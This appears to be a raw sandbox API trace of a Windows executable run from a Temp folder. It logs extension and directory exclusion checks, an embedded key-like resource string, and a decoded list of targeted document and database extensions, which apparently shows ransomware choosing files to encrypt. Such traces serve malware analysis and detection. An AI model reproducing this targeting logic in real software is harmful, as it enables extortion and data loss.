CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.861] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0108.864] GetCurrentThreadId () returned 0xcc4 [0108.864] GetCurrentThreadId () returned 0xcc4 [0108.864] GetCurrentThreadId () returned 0xcc4 [0108.864] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0108.864] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0108.864] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0108.864] LockResource (hResData=0x516f58) returned 0x516f58 [0108.864] FreeResource (hResData=0x516f58) returned 0 [0108.864] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.864] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.864] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.864] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14050b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14050b0, cbMultiByte=38, lpWideCharStr=0x13fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.864] FreeResource (hResData=0x50d64c) returned 0 [0108.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14050b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.864] GetCurrentThreadId () returned 0xcc4 [0108.865] GetCurrentThreadId () returned 0xcc4 [0108.865] GetCurrentThreadId () returned 0xcc4 [0108.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1394258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0108.865] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1394258, cbMultiByte=97, lpWideCharStr=0x1362ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0108.865] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0108.865] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0108.865] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0108.865] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0108.865] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13e0df0, dwCreationFlags=0x4, lpThreadId=0x13fdd84 | out: lpThreadId=0x13fdd84*=0xcd4) returned 0xb8 [0108.875] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0108.875] ResumeThread (hThread=0xb8) returned 0x1 [0108.875] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0109.041] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0109.041] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0109.041] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0109.041] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0109.041] LockResource (hResData=0x5187d4) returned 0x5187d4 [0109.041] FreeResource (hResData=0x5187d4) returned 0 [0109.041] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0109.041] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0109.041] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0109.041] LockResource (hResData=0x50d64c) returned 0x50d64c [0109.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0109.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1405120, cbMultiByte=38, lpWideCharStr=0x13fdf6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0109.041] FreeResource (hResData=0x50d64c) returned 0 [0109.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 